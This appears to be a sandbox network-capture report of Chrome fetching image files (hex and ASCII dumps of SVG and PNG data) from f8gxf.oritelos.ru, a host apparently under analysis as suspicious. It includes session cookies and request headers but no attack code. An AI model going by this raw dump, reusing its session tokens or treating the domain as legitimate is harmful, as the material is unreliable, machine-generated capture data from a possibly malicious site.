                                                2024-05-30 10:21:15 UTC690INData Raw: 62 35 39 0d 0a 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 34 38 22 20 68 65 69 67 68 74 3d 22 34 38 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 34 38 20 34 38 22 3e 3c 74 69 74 6c 65 3e 61 73 73 65 74 73 3c 2f 74 69 74 6c 65 3e 3c 72 65 63 74 20 77 69 64 74 68 3d 22 34 38 22 20 68 65 69 67 68 74 3d 22 34 38 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 2f 3e 3c 70 61 74 68 20 64 3d 22 4d 33 30 2e 34 32 32 2c 32 39 2e 30 39 32 61 33 2e 34 39 33 2c 33 2e 34 39 33 2c 30 2c 30 2c 31 2c 31 2e 33 32 34 2e 32 36 31 2c 33 2e 33 38 31 2c 33 2e 33 38 31 2c 30 2c 30 2c 31 2c 31 2e 31 33 32 2e 37 34 39 71 2e 33 36 36 2e 33 36 36 2e 38 32 37 2e 37 37 35 74 2e 39 34 39 2e 38 35
                                                Data Ascii: b59<svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><title>assets</title><rect width="48" height="48" fill="none"/><path d="M30.422,29.092a3.493,3.493,0,0,1,1.324.261,3.381,3.381,0,0,1,1.132.749q.366.366.827.775t.949.85
                                                2024-05-30 10:21:15 UTC1369INData Raw: 2d 33 2e 38 37 36 41 32 32 2e 32 2c 32 32 2e 32 2c 30 2c 30 2c 31 2c 36 2e 35 38 34 2c 32 32 2e 36 39 2c 31 33 2e 34 38 35 2c 31 33 2e 34 38 35 2c 30 2c 30 2c 31 2c 36 2c 31 38 2e 38 36 36 2c 39 2e 34 35 33 2c 39 2e 34 35 33 2c 30 2c 30 2c 31 2c 36 2e 32 33 35 2c 31 36 2e 36 61 36 2e 32 2c 36 2e 32 2c 30 2c 30 2c 31 2c 2e 37 2d 31 2e 37 30 37 2c 38 2e 38 34 38 2c 38 2e 38 34 38 2c 30 2c 30 2c 31 2c 31 2e 31 34 31 2d 31 2e 34 38 39 71 2e 36 37 39 2d 2e 37 32 33 2c 31 2e 35 38 35 2d 31 2e 36 31 31 61 33 2e 33 38 31 2c 33 2e 33 38 31 2c 30 2c 30 2c 31 2c 31 2e 31 33 32 2d 2e 37 34 39 2c 33 2e 34 39 33 2c 33 2e 34 39 33 2c 30 2c 30 2c 31 2c 31 2e 33 32 34 2d 2e 32 36 31 2c 33 2e 33 2c 33 2e 33 2c 30 2c 30 2c 31 2c 31 2e 36 38 31 2e 34 37 2c 38 2e 36 34 38 2c
                                                Data Ascii: -3.876A22.2,22.2,0,0,1,6.584,22.69,13.485,13.485,0,0,1,6,18.866,9.453,9.453,0,0,1,6.235,16.6a6.2,6.2,0,0,1,.7-1.707,8.848,8.848,0,0,1,1.141-1.489q.679-.723,1.585-1.611a3.381,3.381,0,0,1,1.132-.749,3.493,3.493,0,0,1,1.324-.261,3.3,3.3,0,0,1,1.681.47,8.648,
                                                2024-05-30 10:21:15 UTC853INData Raw: 31 2d 31 2e 31 32 34 2d 2e 37 35 38 6c 2d 38 2e 33 30 39 2d 38 2e 33 30 39 61 33 2e 35 32 2c 33 2e 35 32 2c 30 2c 30 2c 31 2d 2e 37 35 38 2d 31 2e 31 32 34 2c 33 2e 33 37 35 2c 33 2e 33 37 35 2c 30 2c 30 2c 31 2d 2e 32 37 2d 31 2e 33 33 33 2c 33 2e 30 36 32 2c 33 2e 30 36 32 2c 30 2c 30 2c 31 2c 2e 32 32 36 2d 31 2e 32 31 31 2c 34 2e 33 31 33 2c 34 2e 33 31 33 2c 30 2c 30 2c 31 2c 2e 35 36 36 2d 2e 39 36 37 2c 36 2e 33 36 34 2c 36 2e 33 36 34 2c 30 2c 30 2c 31 2c 2e 37 33 32 2d 2e 37 39 33 71 2e 33 39 32 2d 2e 33 35 37 2e 37 33 32 2d 2e 36 38 38 61 34 2e 36 37 38 2c 34 2e 36 37 38 2c 30 2c 30 2c 30 2c 2e 35 36 36 2d 2e 36 35 33 2c 31 2e 31 37 35 2c 31 2e 31 37 35 2c 30 2c 30 2c 30 2c 2e 32 32 36 2d 2e 36 38 38 2c 31 2e 33 33 39 2c 31 2e 33 33 39 2c 30 2c
                                                Data Ascii: 1-1.124-.758l-8.309-8.309a3.52,3.52,0,0,1-.758-1.124,3.375,3.375,0,0,1-.27-1.333,3.062,3.062,0,0,1,.226-1.211,4.313,4.313,0,0,1,.566-.967,6.364,6.364,0,0,1,.732-.793q.392-.357.732-.688a4.678,4.678,0,0,0,.566-.653,1.175,1.175,0,0,0,.226-.688,1.339,1.339,0,
                                                2024-05-30 10:21:15 UTC5INData Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                60192.168.2.449810188.114.96.34434956C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampBytes transferredDirectionData
                                                2024-05-30 10:21:14 UTC1459OUTGET /opoOaMVrzIDE0P1lipe1zMT613jRjCFVKN9uJkQa0A8xgdP12cMBgwt0cXabOuYMflHSHmdef235 HTTP/1.1
                                                Host: f8gxf.oritelos.ru
                                                Connection: keep-alive
                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                sec-ch-ua-mobile: ?0
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                sec-ch-ua-platform: "Windows"
                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                Sec-Fetch-Site: same-origin
                                                Sec-Fetch-Mode: no-cors
                                                Sec-Fetch-Dest: image
                                                Referer: https://f8gxf.oritelos.ru/zyuqihsbghvajrlrrrPCNEXHOWHPJFXHPQVJEVEUXA?hotpuoxsczupfqtsqmzqgeWLKVDKPOARASQVVG
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                Cookie: XSRF-TOKEN=eyJpdiI6IlpUZEJnMmZFenQ3WnRjNEYxL2o5NFE9PSIsInZhbHVlIjoicnJ5MWJ1cDgyNmxySWhLa2FsUExWak1tbDcxTnh5VGVreGxLd3p5b2pONDg4TWVYbVN3Y2FNTFRUdnl5bnBMeFFWdHMzbUNrK25MZFNnOEJOYkZNU21iMU5ndmNGS09wd1dNRzJodVFDRU5ENUFNS0t6MEtjVVJ3aWRJZlJRamkiLCJtYWMiOiIyMTk1NjM3ZjRjYjhjZWM5NmM1Y2MyZTVjYmUzOTUyMjMyZDcyNWNhNDhhYjI0MjExYjcxZmYzNjY5ZTk5ZGQ2IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImlYYmdra3Z4VnJhdWhNYkpGaFhBR2c9PSIsInZhbHVlIjoiakFpOXhEd2pkUS9tZ2UvemdLTUJLQXphNEZsak5hVks5SkcrY0xrUldEOFBORkV3SHJDOVNJZ3BSZ2E5T2FVSmc5YW1IV3B2U3N0cGloUnloTXJkRXJuaGQ4a050SkVHUHYrSG1ZaUhLVFByY1ZSYmdhNjd2bVJmUzFiSkR4WmsiLCJtYWMiOiJmYTJkN2YwNjRlNmVjZWUyNTgzZjFhM2QyYTNiYjBmNTZjM2QwOGE1OWZkYzYxMWFiMWFiZGVmMGNiMTAzMTkyIiwidGFnIjoiIn0%3D
                                                2024-05-30 10:21:15 UTC674INHTTP/1.1 200 OK
                                                Date: Thu, 30 May 2024 10:21:15 GMT
                                                Content-Type: image/png
                                                Content-Length: 29796
                                                Connection: close
                                                Content-Disposition: inline; filename="opoOaMVrzIDE0P1lipe1zMT613jRjCFVKN9uJkQa0A8xgdP12cMBgwt0cXabOuYMflHSHmdef235"
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZXxnyDDt%2FWKbMrGJ8OxQpHqIw5es%2F4pwC2tBrMS%2Fde3yzlaGzOmIHHT7IPHPbBwLo8zxiW01JZpVCgsi%2FqPZe3unXgsC4lsLSgX8bCrYiK5iHg7sI00Ob0ZvXq%2BpDw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                alt-svc: h3=":443"; ma=86400
                                                Server: cloudflare
                                                CF-RAY: 88bdff05df2778e7-EWR
                                                2024-05-30 10:21:15 UTC695INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 fa 00 00 01 2f 08 06 00 00 00 ad e6 03 d5 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 20 00 49 44 41 54 78 5e ec 5d 07 58 53 49 17 3d 88 20 4d b0 80 14 11 54 b0 60 03 b1 8b 58 10 c5 de c5 82 bd ae 7d 7f 5d fb ae 7d ed ab ae ae ae 65 d7 ae 6b ef 1d 7b af 28 2a 56 ec a2 a0 82 82 60 a1 f8 fe 6f 26 10 13 29 69 2f c9 cb cb cc f7 c5 48 32 73 e7 de 73 ef 9b 93 79 6f e6 8e 09 58 61 08 30 04 18 02 0c 01 86 00 43 40 b4 08 98 88 d6 32 66 18 43 80 21 c0 10 60 08 30 04 18 02 60 44 cf 82 80 21 c0 10 60 08 30 04 18 02 22 46 80 11 bd 88 9d cb 4c 63 08 30 04 18 02 0c 01 86 00 23 7a 03 8b 81 b0 1b e1 dc a1 83 07 10 15 15 85 d7 af 5e e1 d5 ab 57 f8 f6 ed 1b 0a 17 76 45 61 d7 c2 28 52 c4 0d d5 ab 57 87 6f a5 4a c8 6b
                                                Data Ascii: PNGIHDR/sRGB IDATx^]XSI= MT`X}]}ek{(*V`o&)i/H2ssyoXa0C@2fC!`0`D!`0"FLc0#z^WvEa(RWoJk
                                                2024-05-30 10:21:15 UTC1369INData Raw: 22 29 29 09 4f 9f 3e 45 fc 87 0f 39 ca cf 97 2f 3f 8a 16 2b 86 62 c5 8a a1 48 91 22 70 2d 52 04 4e 85 1c 58 ec 68 ec 15 26 80 21 c0 10 60 08 68 1f 01 36 58 f3 80 f1 b0 9f 7f e6 8e 86 86 f2 20 e9 bb 08 33 33 73 0c 1d 3b 59 a9 e7 f1 39 75 1c 11 1e 86 63 07 77 23 ee dd 5b 5e f5 73 75 75 85 9b bb 3b 25 fe 0a de de a8 57 2f 00 76 79 6d 58 3c f1 8a 32 13 c6 10 60 08 30 04 34 47 80 0d cc 1a 62 78 f7 fe 03 ae 43 fb 76 72 2b dc 35 14 49 9b 07 b5 68 87 1a b5 03 d4 12 95 92 9c 8c f0 b0 cb 38 7f 22 14 71 b1 fc 12 7c 76 0a 11 e2 af 5b 2f 00 f5 ea d5 43 f5 6a 55 59 5c a9 e5 39 d6 88 21 c0 10 60 08 f0 8f 00 1b 90 35 c4 74 c9 df 4b b9 c5 7f 2d a2 52 1a 34 68 88 05 0b e6 ab 85 69 f8 cd 5b 5c e7 4e 1d a9 9c 3c 79 2c 30 6a ca 6c 95 9f cb 47 bf 7a 89 db 37 ae e1 c6 95 0b 48
                                                Data Ascii: "))O>E9/?+bH"p-RNXh&!`h6X 33s;Y9ucw#[^suu;%W/vymX<2`04GbxCvr+5Ih8"q|v[/CjUY\9!`5tK-R4hi[\N<y,0jlGz7H
                                                2024-05-30 10:21:15 UTC1369INData Raw: 67 ce e2 d6 ad 93 9c 2c 17 dc a1 23 26 4e f8 4d 63 1c 97 2e 5b c6 2d 5a b8 90 ca ac 59 27 10 0d 9b b7 c1 97 2f 5f b0 7c fe 0c b9 a4 37 e4 73 f2 bd 21 97 07 77 6e 61 d7 e6 75 72 cf ee 27 4e 9a 84 60 0d ef 8a 30 a2 37 e4 a8 60 ba f3 81 00 23 7a 3e 50 14 9f 0c 8d 09 4a 7c 90 e4 6c d1 87 84 04 2e b8 5d 7b 44 45 49 16 ce ad f8 f7 5f d4 ac 5e 5d 63 1c 65 ef 12 90 63 68 eb 37 6d 85 3d 9b d7 49 67 be a4 af 36 9d 7b a0 82 6f 55 51 40 4e f6 df ef da bc 56 2e 35 ef 88 5f 46 a2 57 cf 1e 6a 63 c9 88 5e 14 a1 c1 8c d0 00 01 46 f4 1a 80 27 e2 a6 6a 0f aa 22 c6 24 47 d3 76 ec da c5 fd 36 7e 3c ad 43 72 bc ff b7 71 23 2f 18 7e 4c fa c4 05 b7 6b 87 e7 cf b3 4e f0 d2 ad ff 30 14 2f 51 4a 54 b0 bf 89 7e 85 5d 9b d6 e2 d5 cb e7 52 bb 7e 1a 30 00 43 06 0f 56 0b 53 46 f4 a2 0a
                                                Data Ascii: g,#&NMc.[-ZY'/_|7s!wnaur'N`07`#z>PJ|l.]{DEI_^]cech7m=Ig6{oUQ@NV.5_FWjc^F'j"$Gv6~<Crq#/~LkN0/QJT~]R~0CVSF
                                                2024-05-30 10:21:15 UTC1369INData Raw: 98 7d e3 26 a2 92 92 e8 df e5 0b 14 c0 af be 15 51 cd b1 90 b4 ce da 07 0f 31 e1 8a e4 ee 0f 29 25 ed ec f0 6b 25 5f d4 76 76 92 7e b6 f2 de 7d 4c b9 16 26 fd db df d9 09 fe 4e 4e 70 b0 b4 14 dc a5 15 fb e5 0b 8e 45 bd c2 85 98 18 c1 e9 66 2c 0a 31 a2 37 16 4f 6b cf 4e b5 06 54 ed a9 23 2c c9 b1 ef 3f d0 45 78 b1 b1 b1 54 b1 35 6b d7 a1 72 25 5f 8d 31 cb 6a 36 1f 79 ef 0e ce 1c 3b 48 fb a9 1b d4 0c 7e 75 1b 08 0b 0c 9e b5 89 79 fd 8a ce e2 6f 86 5d 96 93 3c 6a f4 18 74 ef d6 55 2d 8c f9 24 fa 62 79 f3 e2 44 8b 66 99 ac 0e da 7f 00 f7 3f c4 d3 cf 03 0a bb 60 65 dd 3a 72 75 e2 be 7e 85 ef 36 c9 e2 4a 52 c8 6c 7e 4d bd ba 99 e4 14 dd f0 9f f4 b3 21 e5 ca 62 84 77 05 9e 11 e6 4f 5c e8 cb 28 f4 3d 25 39 42 99 15 dd 23 c0 88 5e f7 98 8b ad 47 b5 06 54 b1 81 90
                                                Data Ascii: }&Q1)%k%_vv~}L&NNpEf,17OkNT#,?ExT5kr%_1j6y;H~uyo]<jtU-$byDf?`e:ru~6JRl~M!bwO\(=%9B#^GT
                                                2024-05-30 10:21:15 UTC1369INData Raw: cd e3 05 a3 9b b7 23 b8 4e e9 ab f8 89 6c 5b bb 7c 68 d2 ba 03 4a 97 f3 96 53 e0 e1 dd db d8 b7 7d 13 e2 3f c4 a1 aa 5f 1d d4 6f d2 12 79 f2 e4 4c 94 fa f2 61 c2 87 f7 94 e0 2f 9f 3b 25 a7 42 ed 6a ae e8 d5 a1 1c 7c cb 4b d6 1f 28 53 4c 5d 46 69 8c 33 23 7a 65 90 66 75 0c 0d 01 46 f4 86 e6 31 e1 e9 ab f1 e0 2a 3c 93 34 d3 28 b8 43 07 2e e2 f6 6d 2a 64 f6 9c b9 68 da a4 31 2f 18 ed 3b 70 80 1b 3d 72 24 95 6b 97 af 00 06 8f 9e 00 33 33 c9 82 34 52 c8 ed ee fd db ff c3 bd 88 9b 70 72 71 45 ab 8e dd e8 bb 50 cb 95 f3 a7 41 56 d4 7f 88 93 64 0d 24 85 2c b6 1b da cb 97 92 bc aa e5 ab 6d 67 58 d9 b8 6a 84 35 23 7a 55 51 67 f5 0d 01 01 46 f4 86 e0 25 61 eb a8 d1 c0 2a 6c d3 54 d7 ee ec f9 f3 5c ff be 7d 69 43 37 37 37 1c 3c 78 90 37 7c d6 ac 5b c7 cd 9e 39 93 ca
                                                Data Ascii: #Nl[|hJS}?_oyLa/;%Bj|K(SL]Fi3#zefuF1*<4(C.m*dh1/;p=r$k334RprqEPAVd$,mgXj5#zUQgF%a*lT\}iC777<x7|[9
                                                2024-05-30 10:21:15 UTC1369INData Raw: 56 96 b0 33 37 47 5e 33 73 e4 ce 65 02 8e 03 d2 38 0e 09 c9 c9 88 4f 4e 46 cc e7 cf bc f5 65 8c 82 18 d1 1b a3 d7 f9 b5 59 a3 81 95 5f 55 f4 23 ed c0 c1 43 dc c8 5f 46 d0 ce bd 7d 7c b0 71 c3 06 ad 60 22 7b eb be a8 47 09 3c 7d f4 10 ae 6e 45 d1 ac 5d e7 4c 89 71 48 32 1a 72 9b fe cb 97 cf 08 6c da 0a b5 ea 35 94 03 87 1c 1c 43 d2 e3 92 ef 34 c9 9a 77 eb fa 15 7a 9b 9e 6c ef cb 28 24 5d 2d 21 78 b2 a0 4e 95 72 e4 f4 53 fc 32 55 92 21 cf b7 9c 23 56 cf 6f a4 4a 73 a4 58 d5 86 45 be ea 1a 61 cf 88 5e 25 c8 d5 aa ec 69 67 0b ef 82 05 e1 95 2f 1f 4a d8 d9 c1 c3 ce 16 2e 56 56 c8 65 92 b5 eb 52 39 0e af 92 92 f0 28 21 01 0f e3 13 70 f7 fd 7b 84 c7 c6 e1 71 fa 09 8e 6a 29 61 64 8d 18 d1 1b 99 c3 b5 60 ae 46 03 ab 16 f4 d1 b9 c8 a1 c3 86 71 c7 8e 1e a5 fd 8e 18
                                                Data Ascii: V37G^3se8ONFeY_U#C_F}|q`"{G<}nE]LqH2rl5C4wzl($]-!xNrS2U!#VoJsXEa^%ig/J.VVeR9(!p{qj)ad`Fq
                                                2024-05-30 10:21:15 UTC1369INData Raw: f7 fd 07 fc 7b ef 1e b6 3d fe fe b8 49 3d 0b 0d bb 15 23 7a c3 f6 9f 10 b4 d7 78 70 15 82 11 aa ea 10 fd e6 2d 17 18 50 0f 64 d6 4b ca 96 ad db 50 b6 8c 97 56 b1 b8 7e 23 9c eb 12 d2 99 f6 67 69 69 85 d1 53 e7 ca a9 1d 11 7e 8d 3e 8b 27 04 5e a3 4e 7d 04 34 6a 2e 97 03 9f 24 cc d9 b7 7d a3 e4 56 7f 31 4f 34 6b d7 29 53 0a 5d 52 87 6c bb 23 8b fa 64 4b 5e 1b 73 7c 4c 4c a6 1f 91 5b f5 3b ff 69 a9 2a 64 99 ea 93 85 77 13 e6 9e c3 f9 ab 92 0c 7a 65 4b 16 c4 da 3f 9b c0 2c 77 2e 95 64 a7 99 97 82 b9 7d 4b 5e b0 67 44 af 12 f4 74 cf fb 80 32 65 30 a0 6c 19 8d 57 d2 ab d6 b3 f2 b5 c9 b3 fb bf 23 ee 60 c5 dd 7b ca 37 12 59 4d 46 f4 22 73 a8 1e cc e1 65 80 d5 83 de 1a 75 f9 df a6 cd dc b4 a9 53 a8 8c 7a f5 02 f0 d7 5f 8b 74 82 43 fd c0 40 2e fa f5 6b da 6f df 61
                                                Data Ascii: {=I=#zxp-PdKPV~#giiS~>'^N}4j.$}V1O4k)S]Rl#dK^s|LL[;i*dwzeK?,w.d}K^gDt2e0lW#`{7YMF"seuSz_tC@.koa
                                                2024-05-30 10:21:15 UTC1369INData Raw: 26 b9 72 a1 6e 83 a6 a8 5e 3b 00 b9 72 c9 6f 4f 23 5b e5 c8 6a fa d8 b7 92 63 74 49 29 ea 56 08 bd 82 4b a0 55 90 a7 90 e1 ce 52 37 6d dc b2 cf e8 88 11 7d f6 e1 40 08 9e 10 3d df 25 39 25 05 4f a3 62 f0 fa 4d 1c 3e 26 7d 42 4a 4a 2a f2 da 58 c1 3e bf 2d 8a 16 76 42 3e 5b 1b be bb a4 f2 12 53 52 30 fa e2 65 ec 7f fe 5c 2b f2 85 24 94 11 bd 90 bc 61 98 ba e8 9c e8 f4 05 d3 83 c8 48 ae 75 4b c9 fe f1 bc 79 6d b1 6d c7 0e b8 ba 38 eb c5 fe b9 7f fc c1 ad 5a b9 92 ea 62 63 6b 87 fe 3f 8f a1 09 72 64 0b 49 76 43 9e c3 df 8f b8 29 f7 39 59 57 d0 ad 5b 77 38 98 1e 43 ae 54 c3 7a 4e c9 99 58 22 d9 ae 0b ac ac f2 6b 05 77 46 f4 59 5f 5d 2e d6 56 f8 d3 af 26 aa 38 f0 7b e7 e7 65 f4 5b 5c bb fd 00 29 a9 69 d9 5e d6 c5 5c 9d e0 5b b6 24 34 38 4a 21 5b d9 c7 a3 5e e1
                                                Data Ascii: &rn^;roO#[jctI)VKUR7m}@=%9%ObM>&}BJJ*X>-vB>[SR0e\+$aHuKymm8Zbck?rdIvC)9YW[w8CTzNX"kwFY_].V&8{e[\)i^\[$48J![^
                                                2024-05-30 10:21:15 UTC1369INData Raw: f4 ec d5 1b bf 8c 18 2e 6a 7b b3 c3 33 e9 f3 67 ce 34 f9 1e 4c 93 1f 22 57 ca 53 5e 60 27 47 cc a6 99 97 40 9a 79 69 58 5b d9 09 02 57 46 f4 df 5d 5b b5 50 21 6c 69 50 9f 17 5f ff 28 e4 c0 c9 4b f8 f4 e5 fb 09 88 ca 76 e2 5f a5 3c 1c 0b 66 7f b6 82 b2 72 b2 aa 47 96 0c 04 ed 3f 80 07 1f c4 97 ff 9e 11 bd 26 91 c1 da 12 04 04 31 40 6b c3 15 09 89 49 5c ed 5a 7e 48 49 91 64 cd 5a b7 7e 03 7c 2b fa 88 d6 5e 65 31 fc f4 29 9e cb 95 f2 82 66 d5 33 49 7b 83 5c a9 af 15 37 35 31 05 97 2b 3f be e5 76 c2 b7 dc ce f8 96 bb 08 ac ac ed 05 87 25 23 fa ef ae 0c f6 28 8e d9 d5 ab 29 f6 ad 1a 35 ce 85 45 e0 f5 1b d5 b7 73 b6 ac 5f 13 66 66 b9 d5 e8 51 b9 26 7d 4f 9d 41 e8 cb 97 ca 55 36 a0 5a 8c e8 0d c8 59 02 55 55 70 83 35 5f 38 6d dd be 9d 9b 34 61 02 15 e7 e7 57 0b
                                                Data Ascii: .j{3g4L"WS^`'G@yiX[WF][P!liP_(Kv_<frG?&1@kI\Z~HIdZ~|+^e1)f3I{\751+?v%#()5Es_ffQ&}OAU6ZYUUp5_8m4aW
                                                2024-05-30 10:21:15 UTC1369INData Raw: 6e c5 24 7b 74 93 93 bf e2 f1 83 7b 08 bb 7c 1e 0f ee dc 92 d6 f3 f6 f1 c1 46 b6 c5 4e 1c d1 aa c0 0a 46 f4 f2 00 cd aa 5e 15 1d 3c 54 df c3 be f7 f8 05 de 9e c7 ab 12 78 7e be 65 e1 5c a8 a0 2a 4d a4 75 ff bd 77 1f 53 af 85 a9 d5 56 e8 8d 18 d1 0b dd 43 c2 d7 cf 20 88 be 73 e7 10 2e 3c 5c 92 c3 da 2e 5f 7e b4 e9 dc 03 ee c5 b3 5f 51 7c ed e2 59 ec dd b6 51 8a 7e a7 ce 21 f8 75 fc 38 83 b0 55 f8 21 23 5c 0d 19 d1 cb fb 46 9d 13 ec 94 d9 1b af ad 08 28 e3 e9 0e f2 52 a7 90 8c 78 24 33 9e 18 0b 23 7a 31 7a 55 b7 36 09 9e fc 36 6d d9 c2 4d 9d 3c 99 a2 62 6a 6a 8a 3e 43 46 c2 d9 d5 4d 21 4a 61 97 ce 61 cf d6 0d d2 7a 5b b6 6e 43 d9 32 5e 82 b7 57 a1 61 ac 42 b6 08 30 a2 97 87 c6 3d af 0d 36 05 d6 87 b3 95 f2 e9 67 95 c9 76 a7 ad 10 54 37 b9 4e 64 7c 02 3a 1e
                                                Data Ascii: n${t{|FNF^<Tx~e\*MuwSVC s.<\._~_Q|YQ~!u8U!#\F(Rx$3#z1zU66mM<bjj>CFM!Jaaz[nC2^WaB0=6gvT7Nd|:


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                61192.168.2.449811188.114.96.34434956C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampBytes transferredDirectionData
                                                2024-05-30 10:21:14 UTC1437OUTGET /uvqJ1vttlOtyse1uiNXANyDnlVmnMePabfpUCdRdsK7hMtqc7ef260 HTTP/1.1
                                                Host: f8gxf.oritelos.ru
                                                Connection: keep-alive
                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                sec-ch-ua-mobile: ?0
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                sec-ch-ua-platform: "Windows"
                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                Sec-Fetch-Site: same-origin
                                                Sec-Fetch-Mode: no-cors
                                                Sec-Fetch-Dest: image
                                                Referer: https://f8gxf.oritelos.ru/zyuqihsbghvajrlrrrPCNEXHOWHPJFXHPQVJEVEUXA?hotpuoxsczupfqtsqmzqgeWLKVDKPOARASQVVG
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                Cookie: XSRF-TOKEN=eyJpdiI6IlpUZEJnMmZFenQ3WnRjNEYxL2o5NFE9PSIsInZhbHVlIjoicnJ5MWJ1cDgyNmxySWhLa2FsUExWak1tbDcxTnh5VGVreGxLd3p5b2pONDg4TWVYbVN3Y2FNTFRUdnl5bnBMeFFWdHMzbUNrK25MZFNnOEJOYkZNU21iMU5ndmNGS09wd1dNRzJodVFDRU5ENUFNS0t6MEtjVVJ3aWRJZlJRamkiLCJtYWMiOiIyMTk1NjM3ZjRjYjhjZWM5NmM1Y2MyZTVjYmUzOTUyMjMyZDcyNWNhNDhhYjI0MjExYjcxZmYzNjY5ZTk5ZGQ2IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImlYYmdra3Z4VnJhdWhNYkpGaFhBR2c9PSIsInZhbHVlIjoiakFpOXhEd2pkUS9tZ2UvemdLTUJLQXphNEZsak5hVks5SkcrY0xrUldEOFBORkV3SHJDOVNJZ3BSZ2E5T2FVSmc5YW1IV3B2U3N0cGloUnloTXJkRXJuaGQ4a050SkVHUHYrSG1ZaUhLVFByY1ZSYmdhNjd2bVJmUzFiSkR4WmsiLCJtYWMiOiJmYTJkN2YwNjRlNmVjZWUyNTgzZjFhM2QyYTNiYjBmNTZjM2QwOGE1OWZkYzYxMWFiMWFiZGVmMGNiMTAzMTkyIiwidGFnIjoiIn0%3D
                                                2024-05-30 10:21:15 UTC648INHTTP/1.1 200 OK
                                                Date: Thu, 30 May 2024 10:21:15 GMT
                                                Content-Type: image/png
                                                Content-Length: 70712
                                                Connection: close
                                                Content-Disposition: inline; filename="uvqJ1vttlOtyse1uiNXANyDnlVmnMePabfpUCdRdsK7hMtqc7ef260"
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2Ifatk1T0Mjr0eBeUJx6gl7I%2FO%2BACEppWyCkc5JP%2FmZmFVkODV5UrJzTXvGAU9GP0QN5aaIYsLMVOYxQm1aW1hWXdYGRJdZhB4Dqpai3rBaiusGHtUxT5u7H8iMe8w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                alt-svc: h3=":443"; ma=86400
                                                Server: cloudflare
                                                CF-RAY: 88bdff05eeaf4327-EWR
                                                2024-05-30 10:21:15 UTC721INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 09 8e 00 00 03 83 08 06 00 00 00 11 c6 07 ce 00 00 20 00 49 44 41 54 78 01 ec dd cf 71 e3 c6 b6 07 e0 09 c1 21 38 04 6f 6e 95 97 13 c2 ac df 7b 0b 87 a0 12 34 7b ef ef 7b 55 0a 41 21 78 e7 ed 84 a0 10 74 33 50 06 7e d5 53 38 36 0d 13 10 4e 13 7f 1a e0 37 55 53 4d 89 0d 10 f8 70 9a 22 1b 3f 82 9f 3e f9 47 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40
                                                Data Ascii: PNGIHDR IDATxq!8on{4{{UA!xt3P~S86N7USMp"?>G @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
                                                2024-05-30 10:21:15 UTC1369INData Raw: 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80
                                                Data Ascii: @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
